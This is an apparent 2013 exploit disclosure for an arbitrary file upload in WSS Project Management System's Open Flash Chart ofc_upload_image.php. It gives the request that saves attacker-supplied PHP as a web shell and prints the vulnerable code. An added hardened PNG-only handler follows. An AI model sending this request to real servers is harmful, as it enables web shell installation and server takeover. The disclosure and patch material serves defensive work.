Title: WSS Project Management System POST get shell
Author: admin
Time: 2013-2-23 12:38

POST data: the vulnerable file saves the request body as a file with an arbitrary extension.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploit: /chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data.

Saved to: http://localhost/chart/tmp-upload-images/hfy.php

Vulnerable file from the latest version of WSS; even the paid version has it. Demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/* ... */

// full path to the saved image including filename //
// ($default_path is set in lines not reproduced in this post)
// basename() only strips directories; the extension from ?name= is kept as-is
$destination = $default_path . basename( $_GET[ 'name' ] );

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// the raw request body is written to disk without any content check
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}
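
For comparison with the listing above, a hardened variant of the raw-POST branch, as an added example that is not part of the original post or of the WSS / Open Flash Chart code. The function names, the PNG-only policy, the 2 MiB cap and the relative target directory (inferred from the two URLs in the post) are assumptions.

```php
<?php
// Added example: hardened raw-POST upload handler (not the project's own code).
// Assumptions: only PNG charts are accepted, a 2 MiB size cap, hypothetical
// function names, and a target directory one level above this script.
const OFC_MAX_BYTES = 2097152;                 // assumed size cap (2 MiB)
const PNG_MAGIC     = "\x89PNG\r\n\x1a\n";     // 8-byte PNG file signature

// Return a safe "<stem>.png" file name, or null if the name must be rejected.
function ofc_safe_name(string $requested): ?string
{
    $base = basename($requested);
    // Allow-list: alphanumeric stem without dots, exactly one ".png" suffix.
    // Rejects hfy.php, double extensions, NUL bytes and trailing dots.
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\.png\z/', $base) === 1 ? $base : null;
}

// True only if the body is within the size cap and starts with the PNG signature.
function ofc_is_png(string $body): bool
{
    return strlen($body) >= 8
        && strlen($body) <= OFC_MAX_BYTES
        && strncmp($body, PNG_MAGIC, 8) === 0;
}

// Validate name and content, then write the file; false means "rejected".
function ofc_save_chart(string $dir, string $requested, string $body): bool
{
    $name = ofc_safe_name($requested);
    if ($name === null || !ofc_is_png($body)) {
        return false;
    }
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return false;
    }
    // LOCK_EX serializes concurrent writes to the same file.
    return file_put_contents($dir . '/' . $name, $body, LOCK_EX) !== false;
}

// Request handling: php://input replaces the removed $HTTP_RAW_POST_DATA.
if (PHP_SAPI !== 'cli') {
    $name = is_string($_GET['name'] ?? null) ? $_GET['name'] : '';
    $body = (string) file_get_contents('php://input', false, null, 0, OFC_MAX_BYTES + 1);
    $ok   = ofc_save_chart(__DIR__ . '/../tmp-upload-images', $name, $body);
    http_response_code($ok ? 200 : 400);
    echo $ok ? 'saved' : 'rejected';
}
```

Disabling script execution for tmp-upload-images/ in the web server configuration covers the case where a file with an unexpected extension still ends up there.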